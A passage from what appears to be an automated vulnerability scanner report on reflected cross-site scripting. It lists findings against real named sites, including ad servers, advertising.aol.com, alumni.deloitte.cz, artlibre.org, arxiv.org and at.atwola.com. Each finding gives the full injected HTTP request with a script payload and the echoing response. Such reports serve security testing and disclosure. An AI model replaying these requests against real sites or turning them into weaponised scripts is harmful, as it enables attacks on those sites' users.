GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=46733511626"-alert(1)-"1111d615a75&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:57 GMT
Expires: Mon, 22 Nov 2010 00:08:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7028

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/14a/%2a/d%3B231155693%3B3-0%3B0%3B54795159%3B4307-300/250%3B38011073/38028830/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=46733511626"-alert(1)-"1111d615a75&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=
...[SNIP]...

1.77. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d853"-alert(1)-"06c62bbdd38 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=29d853"-alert(1)-"06c62bbdd38&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:34 GMT
Expires: Mon, 22 Nov 2010 00:10:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
%3Dv8/3a5a/17/14a/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=29d853"-alert(1)-"06c62bbdd38&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.
...[SNIP]...

1.78. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c49e5"-alert(1)-"8a7d815ab33 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041c49e5"-alert(1)-"8a7d815ab33&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:32 GMT
Expires: Mon, 22 Nov 2010 00:08:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...

var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/14a/%2a/u%3B231155693%3B7-0%3B0%3B54795159%3B4307-300/250%3B38520812/38538569/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041c49e5"-alert(1)-"8a7d815ab33&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.
...[SNIP]...

1.79. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1d05"-alert(1)-"b12f47b9ddd was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46d1d05"-alert(1)-"b12f47b9ddd&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:31 GMT
Expires: Mon, 22 Nov 2010 00:16:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
t=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46d1d05"-alert(1)-"b12f47b9ddd&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=609AA01A&cn=itmrgquestdubai");
var fscUrl = url;
var fscUrlClickTagF
...[SNIP]...

1.80. http://advertising.aol.com/brands/tuaw [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/tuaw

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94be2'><script>alert(1)</script>9f219222b62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/tuaw94be2'><script>alert(1)</script>9f219222b62 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:18:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=514944d6482739b248886c388971410b; expires=Wed, 15 Dec 2010 04:52:19 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:18:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<img src='/sites/default/files/webfm/brand-logos/tuaw94be2'><script>alert(1)</script>9f219222b62.png' alt='tuaw94be2'>
...[SNIP]...

1.81. http://advertising.aol.com/brands/tuaw [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/tuaw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1d2a'><script>alert(1)</script>baf21def41f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/tuaw?f1d2a'><script>alert(1)</script>baf21def41f=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:18:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=8359ee48556954edb316d76322eb445d; expires=Wed, 15 Dec 2010 04:52:04 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:18:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<img src='/sites/default/files/webfm/brand-logos/tuaw&f1d2a'><script>alert(1)</script>baf21def41f=1.png' alt='tuaw&f1d2a'>
...[SNIP]...

1.82. http://alumni.deloitte.cz/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alumni.deloitte.cz
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e49cf"><script>alert(1)</script>5c886eb515 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e49cf"><script>alert(1)</script>5c886eb515=1 HTTP/1.1
Host: alumni.deloitte.cz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:18:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.3
Set-Cookie: PHPSESSID=75ac4f96d3bf692d5fb8c42a7e63c71e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
...[SNIP]...
<form name="frmLogin" id="frmLogin" action="/?e49cf"><script>alert(1)</script>5c886eb515=1" method="post">
...[SNIP]...

1.83. http://artlibre.org/licence/lalgb.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artlibre.org
Path:   /licence/lalgb.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df786<script>alert(1)</script>1f52ce30d3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /licencedf786<script>alert(1)</script>1f52ce30d3f/lalgb.html HTTP/1.1
Host: artlibre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:33:12 GMT
Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
X-Powered-By: PHP/4.4.4 with Hardening-Patch
X-Pingback: http://artlibre.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:33:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 6014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/x
...[SNIP]...
<a href="#">http://artlibre.org/licencedf786<script>alert(1)</script>1f52ce30d3f/lalgb.html</a>
...[SNIP]...

1.84. http://artlibre.org/licence/lalgb.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artlibre.org
Path:   /licence/lalgb.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9faec<script>alert(1)</script>e8dae2f14a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /licence/9faec<script>alert(1)</script>e8dae2f14a5 HTTP/1.1
Host: artlibre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:33:16 GMT
Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
X-Powered-By: PHP/4.4.4 with Hardening-Patch
X-Pingback: http://artlibre.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:33:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 6004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/x
...[SNIP]...
<a href="#">http://artlibre.org/licence/9faec<script>alert(1)</script>e8dae2f14a5</a>
...[SNIP]...

1.85. http://arxiv.org/abs/1003.0449 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://arxiv.org
Path:   /abs/1003.0449

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1786e</title><script>alert(1)</script>164767422c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abs/1003.04491786e</title><script>alert(1)</script>164767422c2 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565968129; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1824

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<title>[1003.04491786e</title><script>alert(1)</script>164767422c2] Bad paper identifier</title>
...[SNIP]...

1.86. http://arxiv.org/abs/1003.0449 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://arxiv.org
Path:   /abs/1003.0449

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19375<script>alert(1)</script>1132cb8b8bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abs/1003.044919375<script>alert(1)</script>1132cb8b8bf HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565166801; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1800

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<h1>Paper identifier '1003.044919375<script>alert(1)</script>1132cb8b8bf' not recognized</h2>
...[SNIP]...

1.87. http://arxiv4.library.cornell.edu/abs/1011.3707 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://arxiv4.library.cornell.edu
Path:   /abs/1011.3707

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3a16c</title><script>alert(1)</script>c9c8fd9cb5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abs/1011.37073a16c</title><script>alert(1)</script>c9c8fd9cb5e HTTP/1.1
Host: arxiv4.library.cornell.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:47 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389567349336; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1824

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<title>[1011.37073a16c</title><script>alert(1)</script>c9c8fd9cb5e] Bad paper identifier</title>
...[SNIP]...

1.88. http://arxiv4.library.cornell.edu/abs/1011.3707 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://arxiv4.library.cornell.edu
Path:   /abs/1011.3707

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e1c1<script>alert(1)</script>0f8702ef860 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abs/1011.37074e1c1<script>alert(1)</script>0f8702ef860 HTTP/1.1
Host: arxiv4.library.cornell.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565501583; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1800

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<h1>Paper identifier '1011.37074e1c1<script>alert(1)</script>0f8702ef860' not recognized</h2>
...[SNIP]...

1.89. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13199"><script>alert(1)</script>c1eaaf68b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe13199"><script>alert(1)</script>c1eaaf68b6c/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn13199"><script>alert(1)</script>c1eaaf68b6c/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.90. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d3d"><script>alert(1)</script>c653d13393c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0b7d3d"><script>alert(1)</script>c653d13393c/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0b7d3d"><script>alert(1)</script>c653d13393c/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.91. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1bb"><script>alert(1)</script>795dc3822fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

